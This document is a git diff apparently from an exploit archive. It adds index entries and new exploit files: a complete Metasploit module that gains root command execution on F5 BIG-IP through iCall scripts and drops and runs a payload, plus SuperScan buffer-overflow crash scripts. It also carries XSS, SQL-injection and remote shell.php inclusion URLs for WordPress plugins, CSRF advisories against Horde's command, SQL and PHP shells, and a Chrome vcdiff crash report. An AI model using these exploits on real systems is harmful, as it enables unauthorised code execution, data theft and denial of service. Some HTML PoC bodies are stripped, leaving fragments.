diff --git a/files.csv b/files.csv index 0fb3354d3..b8d7050ea 100755 --- a/files.csv +++ b/files.csv @@ -35021,3 +35021,17 @@ id,file,description,date,author,platform,type,port 38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0 38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 +38752,platforms/windows/local/38752.c,"Watchguard Server Center Local Privilege Escalation Vulnerability",2013-09-08,"Julien Ahrens",windows,local,0 +38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 +38754,platforms/php/webapps/38754.txt,"eTransfer Lite 'file name' Parameter HTML Injection Vulnerability",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 +38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection Vulnerability",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 +38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 +38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0 +38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 +38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 +38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0 +38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0 +38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities.",2015-11-19,Un_N0n,windows,webapps,0 +38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 +38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,metasploit,hardware,remote,443 +38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF Vulnerability",2015-11-19,"High-Tech Bridge SA",php,webapps,80 diff --git a/platforms/hardware/remote/38764.rb b/platforms/hardware/remote/38764.rb new file mode 100755 index 000000000..8556b7835 --- /dev/null +++ b/platforms/hardware/remote/38764.rb @@ -0,0 +1,283 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'nokogiri' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" } + STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } + LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' } + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "F5 iControl iCall::Script Root Command Execution", + 'Description' => %q{ + This module exploits an authenticated privilege escalation + vulnerability in the iControl API on the F5 BIG-IP LTM (and likely + other F5 devices). This requires valid credentials and the Resource + Administrator role. The exploit should work on BIG-IP 11.3.0 + - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references + for more details) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'tom', # Discovery, Metasploit module + 'Jon Hart ' # Metasploit module + ], + 'References' => + [ + ['CVE', '2015-3628'], + ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'], + ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html'] + ], + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['F5 BIG-IP LTM 11.x', {}] + ], + 'Privileged' => true, + 'DisclosureDate' => "Sep 3 2015", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']), + OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), + OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']) + ]) + register_advanced_options( + [ + OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]), + OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']), + OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']), + OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072]) + ]) + end + + def setup + file = datastore['FILENAME'] + file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}" + @payload_path = ::File.join(datastore['PATH'], file) + super + end + + def build_xml + builder = Nokogiri::XML::Builder.new do |xml| + xml.Envelope do + xml = xml_add_namespaces(xml) + xml['soapenv'].Header + xml['soapenv'].Body do + yield xml + end + end + end + builder.to_xml + end + + def xml_add_namespaces(xml) + ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/") + xml.doc.root.namespace = ns + xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance") + xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema") + xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script") + xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding") + xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler") + xml + end + + def send_soap_request(pay) + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'POST', + 'data' => pay, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + ) + if res + return res + else + vprint_error('No response') + end + false + end + + def create_script(name, cmd) + create_xml = build_xml do |xml| + xml['scr'].create(SOAPENV_ENCODINGSTYLE) do + xml.scripts(STRING_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + xml.item name + end + xml.definitions(STRING_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + xml.item cmd + end + end + end + send_soap_request(create_xml) + end + + def delete_script(script_name) + delete_xml = build_xml do |xml| + xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do + xml.scripts(STRING_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + xml.item script_name + end + end + end + print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml)) + res + end + + def script_exists?(script_name) + exists_xml = build_xml do |xml| + xml['scr'].get_list(SOAPENV_ENCODINGSTYLE) + end + res = send_soap_request(exists_xml) + res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}") + end + + def create_handler(handler_name, script_name) + print_status("Creating trigger #{handler_name}") + handler_xml = build_xml do |xml| + xml['per'].create(SOAPENV_ENCODINGSTYLE) do + xml.handlers(STRING_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + xml.item handler_name + end + xml.scripts(STRING_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + xml.item script_name + end + xml.intervals(LONG_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + # we set this to run once every 24h, but because there is no + # start/end time it will run once, more or less immediately, and + # again 24h from now, but by that point hopefully we will have + # cleaned up and the handler/script/etc are gone + xml.item 60 * 60 * 24 + end + end + end + res = send_soap_request(handler_xml) + if res + if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler") + true + else + print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}") + false + end + else + print_error("No response to trigger creation") + false + end + end + + def delete_handler(handler_name) + delete_xml = build_xml do |xml| + xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do + xml.handlers(STRING_ATTRS) do + xml.parent.namespace = xml.parent.parent.namespace_definitions.first + xml.item handler_name + end + end + end + + print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml)) + res + end + + def handler_exists?(handler_name) + handler_xml = build_xml do |xml| + xml['per'].get_list(SOAPENV_ENCODINGSTYLE) + end + res = send_soap_request(handler_xml) + res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}") + end + + def check + # strategy: we'll send a create_script request, with empty name: + # if everything is ok, the server return a 500 error saying it doesn't like empty names + # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'. + # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable + # any other response is considered not vulnerable + res = create_script('', '') + if res && res.code == 500 && res.body =~ /path is empty/ + return Exploit::CheckCode::Appears + elsif res && res.code == 401 + print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?") + return Exploit::CheckCode::Unknown + else + return Exploit::CheckCode::Safe + end + end + + def exploit + # phase 1: create iCall script to create file with payload, execute it and remove it. + shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path}) + cmd = %(exec /bin/sh -c "#{shell_cmd}") + + arg_max = datastore['ARG_MAX'] + if shell_cmd.size > arg_max + print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\ + "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)" + return false + end + + script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}" + print_status("Uploading payload script #{script_name}") + unless (create_script_res = create_script(script_name, cmd)) + print_error("No response when uploading payload script") + return false + end + unless create_script_res.code == 200 + print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\ + "#{create_script_res.code} #{create_script_res.message}") + return false + end + unless script_exists?(script_name) + print_error("Payload script uploaded successfully but script was not found") + return false + end + register_file_for_cleanup @payload_path + + # phase 2: create iCall Handler, that will actually run the previously created script + handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}" + unless create_handler(handler_name, script_name) + delete_script(script_name) + return false + end + unless handler_exists?(handler_name) + print_error("Trigger created successfully but was not found") + delete_script(script_name) + return false + end + print_status('Waiting for payload to execute...') + + # if our payload has not been successfully executed just yet, wait + # until it does or give up + slept = 0 + until session_created? || slept > datastore['SESSION_WAIT'] + Rex.sleep(1) + slept += 1 + end + + print_status('Trying cleanup...') + delete_script(script_name) + delete_handler(handler_name) + end +end \ No newline at end of file diff --git a/platforms/lin_x86/dos/38763.txt b/platforms/lin_x86/dos/38763.txt new file mode 100755 index 000000000..7029bb4a0 --- /dev/null +++ b/platforms/lin_x86/dos/38763.txt @@ -0,0 +1,131 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=513 + +There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC. + +(/src/sdch/open-vcdiff/src/headerparser.cc) + +bool VCDiffHeaderParser::ParseSectionLengths( + bool has_checksum, + size_t* add_and_run_data_length, + size_t* instructions_and_sizes_length, + size_t* addresses_length, + VCDChecksum* checksum) { + ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled + ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled + ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled + if (has_checksum) { + ParseChecksum("Adler32 checksum value", checksum); + } + if (RESULT_SUCCESS != return_code_) { + return false; + } + if (!delta_encoding_start_) { + VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths " + "was called before ParseWindowLengths" << VCD_ENDL; + return_code_ = RESULT_ERROR; + return false; + } + const size_t delta_encoding_header_length = + UnparsedData() - delta_encoding_start_; + if (delta_encoding_length_ != + (delta_encoding_header_length + + *add_and_run_data_length + + *instructions_and_sizes_length + + *addresses_length)) { // <---- Integer overflow here (32-bit systems only) + VCD_ERROR << "The length of the delta encoding does not match " + "the size of the header plus the sizes of the data sections" + << VCD_ENDL; + return_code_ = RESULT_ERROR; + return false; + } + return true; +} + +These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024) + +size_t add_and_run_data_length = 0; + size_t instructions_and_sizes_length = 0; + size_t addresses_length = 0; + if (!header_parser->ParseSectionLengths(has_checksum_, + &add_and_run_data_length, + &instructions_and_sizes_length, + &addresses_length, + &expected_checksum_)) { + return header_parser->GetResult(); + } + if (parent_->AllowInterleaved() && + // snip... + } else { + // If interleaved format is not used, then the whole window contents + // must be available before decoding can begin. If only part of + // the current window is available, then report end of data + // and re-parse the whole header when DecodeChunk() is called again. + if (header_parser->UnparsedSize() < (add_and_run_data_length + + instructions_and_sizes_length + + addresses_length)) { + return RESULT_END_OF_DATA; + } + data_for_add_and_run_.Init(header_parser->UnparsedData(), + add_and_run_data_length); + instructions_and_sizes_.Init(data_for_add_and_run_.End(), + instructions_and_sizes_length); + addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length); + +This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t. + +It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point. + +It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH. + +VERSION +Chrome Version: 47.0.2499.0 +Operating System: Linux x86 + +REPRODUCTION CASE +Please include a demonstration of the security bug, such as an attached +HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE +make the file as small as possible and remove any content not required to +demonstrate the bug. + +FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION +Type of crash: browser +Crash State: + +eax 0xf9ae8a78 -106001800 +ecx 0xe7502d43 -414175933 +edx 0x7b83e020 2072240160 +ebx 0xf76597a0 -144336992 +esp 0xe75025d0 0xe75025d0 +ebp 0xe7502798 0xe7502798 +esi 0x5 5 +edi 0xf9061200 -117042688 +eip 0xf1ddebee 0xf1ddebee +eflags 0x210a93 [ CF AF SF IF OF RF ID ] +cs 0x23 35 +ss 0x2b 43 +ds 0x2b 43 +es 0x2b 43 +fs 0x0 0 +gs 0x63 99 + +=> 0xf1ddebee : movzbl (%edx),%ecx + 0xf1ddebf1 : mov (%edi),%esi + 0xf1ddebf3 : cmpb $0x0,0x100(%esi,%ecx,1) + 0xf1ddebfb : je 0xf1ddec06 + 0xf1ddebfd : movsbl %cl,%edx + +#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78 +#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231 +#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359 +#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=, len=, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887 +#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", , len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393 +#5 0xf1d2b17f in DecodeChunk > (this=0x7b83e020, data=, len=3880791363, output=) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83 +#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=) at ../../net/filter/sdch_filter.cc:424 +#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 , dest_len=0xe75033c8) at ../../net/filter/filter.cc:131 +#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145 +#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=) at ../../net/url_request/url_request_job.cc:673 +#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=, buf_size=, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38763.zip + diff --git a/platforms/php/webapps/38753.html b/platforms/php/webapps/38753.html new file mode 100755 index 000000000..86d1e65ea --- /dev/null +++ b/platforms/php/webapps/38753.html @@ -0,0 +1,202 @@ +source: http://www.securityfocus.com/bid/62269/info + +The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities. + +Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible. + +Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected. + + +f of Concept +======================== +Add Customer +
+ + + + + + + + + + + +
+ +Update Customer +
+ + + + + + + + + + + + + +
+ +New Booking +
+ + + + + + + + + +
+ +Add Service +
+ + + + + + + + + + + + + + + + + + + +
+ +Add Block Out +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +Add Cupon +
+ + + + + + + + + + +
+ +Default Settings +
+ + + + + + + + + +
+ +Reminder Settings +
+ + + + + +
+ +PayPal Settings +
+ Email: + + + + + + + +
+ +Mailchimp Settings +
+ + + + + + + + +
+ +Facebook Connect +
+ + + + + + +
+ +Auto Approve +
+ + + + +
+ +Delete All Bookings +
+ + + +
+ +Restore Factory Settings +
+ + + +
+ diff --git a/platforms/php/webapps/38754.txt b/platforms/php/webapps/38754.txt new file mode 100755 index 000000000..9b7ec1845 --- /dev/null +++ b/platforms/php/webapps/38754.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/62313/info + +eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. + +eTransfer Lite 1.0 is vulnerable; other versions may also be affected. + +The following files are hosted live from the iPad's Docs folder.

Images:

 +<[PERSISTENT INJECTED SCRIPT +CODE!]">s2.png +( 51.8 Kb, 2013-08-25 02:09:25 +0000)
+a2b642e7de.jpg +( 238.0 Kb, 2013-08-25 02:08:13 +0000)
+










Powered + By

diff --git a/platforms/php/webapps/38755.txt b/platforms/php/webapps/38755.txt new file mode 100755 index 000000000..e9dded6e0 --- /dev/null +++ b/platforms/php/webapps/38755.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/62438/info + +mukioplayer4wp for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +mukioplayer4wp 1.6 is vulnerable; other versions may also be affected. + +http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27 \ No newline at end of file diff --git a/platforms/php/webapps/38756.txt b/platforms/php/webapps/38756.txt new file mode 100755 index 000000000..498a93118 --- /dev/null +++ b/platforms/php/webapps/38756.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/62458/info + +The RokNewsPager plugin for WordPress is prone to multiple security vulnerabilities, including: + +1. An information-disclosure vulnerability +2. A cross-site scripting vulnerability +3. An arbitrary file-upload vulnerability +4. A denial-of-service vulnerability + +Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg +http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http:// +http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example.com/big_file&h=1&w=1 +http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/38757.txt b/platforms/php/webapps/38757.txt new file mode 100755 index 000000000..232cca1d0 --- /dev/null +++ b/platforms/php/webapps/38757.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/62459/info + +The RokStories plugin for WordPress is prone to multiple security vulnerabilities, including: + +1. An arbitrary file-upload vulnerability +2. A cross-site scripting vulnerability +3. An information-disclosure vulnerability +4. A denial-of-service vulnerability + +Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +RokStories 1.25 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg + +http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http:// + +http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example.com/big_file&h=1&w=1 + +http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/38765.txt b/platforms/php/webapps/38765.txt new file mode 100755 index 000000000..733cedc52 --- /dev/null +++ b/platforms/php/webapps/38765.txt @@ -0,0 +1,90 @@ +Advisory ID: HTB23272 +Product: Horde Groupware +Vendor: http://www.horde.org +Vulnerable Version(s): 5.2.10 and probably prior +Tested Version: 5.2.10 +Advisory Publication: September 30, 2015 [without technical details] +Vendor Notification: September 30, 2015 +Vendor Patch: October 22, 2015 +Public Disclosure: November 18, 2015 +Vulnerability Type: Cross-Site Request Forgery [CWE-352] +CVE Reference: CVE-2015-7984 +Risk Level: High +CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H] +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and company’s infrastructure. + + +1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984 + +1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server. + +CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory: + + +
+ + +
+ + + +1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database. + +The exploit code below executes "SELECT version()" query and displays version of current MySQL server: + + +
+ + +
+ + + +1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server. + +The exploit code below executes the "phpinfo()" function and displays its output: + + +
+ + + +
+ + + +----------------------------------------------------------------------------------------------- + +Solution: + +Update to Horde Groupware 5.2.11 + +More Information: +http://lists.horde.org/archives/announce/2015/001137.html + +----------------------------------------------------------------------------------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware. +[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. + +----------------------------------------------------------------------------------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/windows/dos/38758.py b/platforms/windows/dos/38758.py new file mode 100755 index 000000000..e91e724ce --- /dev/null +++ b/platforms/windows/dos/38758.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC +# Discovery by      : Luis Martínez +# Email : l4m5@hotmail.com +# Discovery Date    : 18/11/2015 +# Vendor Homepage   : http://www.foundstone.com +# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx +# Tested Version    : 4.1 +# Vulnerability Type    : Denial of Service (DoS) Local +# Tested on OS      : Windows XP Professional SP3 x86 es +# Steps to Produce the Crash: +# 1.- Run python code : python super_scan_4.1.py +# 2.- Open super_scan_4.1.txt and copy content to clipboard +# 3.- Open SuperScan4.1.exe +# 4.- Paste Clipboard Scan > Hostname/IP +# 5.- Clic on add button (->) +# 6.- Crashed + +buffer = "\x41" * 636 +eip = "\x42" * 4 + +f = open ("super_scan_4.1.txt", "w") +f.write(buffer + eip) +f.close() diff --git a/platforms/windows/dos/38759.py b/platforms/windows/dos/38759.py new file mode 100755 index 000000000..4f79d249d --- /dev/null +++ b/platforms/windows/dos/38759.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC +# Discovery by      : Luis Martínez +# Email : l4m5@hotmail.com +# Discovery Date    : 18/11/2015 +# Vendor Homepage   : http://www.foundstone.com +# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx +# Tested Version    : 4.1 +# Vulnerability Type    : Denial of Service (DoS) Local +# Tested on OS      : Windows XP Professional SP3 x86 es +# Steps to Produce the Crash: +# 1.- Run python code : python super_scan_4.1_tools.py +# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard +# 3.- Open SuperScan4.1.exe +# 4.- Paste Clipboard Tools > Hostname/IP/URL +# 5.- Clic on button -> Whois +# 6.- Crashed + +buffer = "\x41" * 280 +eip = "\x42" * 4 + +f = open ("super_scan_4.1_tools.txt", "w") +f.write(buffer + eip) +f.close() diff --git a/platforms/windows/dos/38760.py b/platforms/windows/dos/38760.py new file mode 100755 index 000000000..d371def74 --- /dev/null +++ b/platforms/windows/dos/38760.py @@ -0,0 +1,53 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC +# Discovery by      : Luis Martínez +# Email : l4m5@hotmail.com +# Discovery Date    : 18/11/2015 +# Vendor Homepage   : http://www.foundstone.com +# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx +# Tested Version    : 4.1 +# Vulnerability Type    : Denial of Service (DoS) Local +# Tested on OS      : Windows XP Professional SP3 x86 es +# Steps to Produce the Crash: +# 1.- Run python code : python super_scan_4.1_windows_enumeration.py +# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard +# 3.- Open SuperScan4.1.exe +# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL +# 5.- Clic on button -> Enumerate +# 6.- Crashed +########################################################################################## +# -----------------------------------NOTES----------------------------------------------# +########################################################################################## +# After the execution of POC, the SEH chain looks like this: +# 00E3FF98 43434343 +# 42424242 *** CORRUPT ENTRY *** + +# And the Stack + +#00E3FF88 41414141 AAAA +#00E3FF8C 41414141 AAAA +#00E3FF90 41414141 AAAA +#00E3FF94 41414141 AAAA +#00E3FF98 42424242 BBBB Pointer to next SEH record +#00E3FF9C 43434343 CCCC SE handler + +# And the Registers + +#EAX 00000001 +#ECX 00000001 +#EDX 7C91E514 ntdll.KiFastSystemCallRet +#EBX 00A028E8 +#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" +#EBP 41414141 +#ESI 00473774 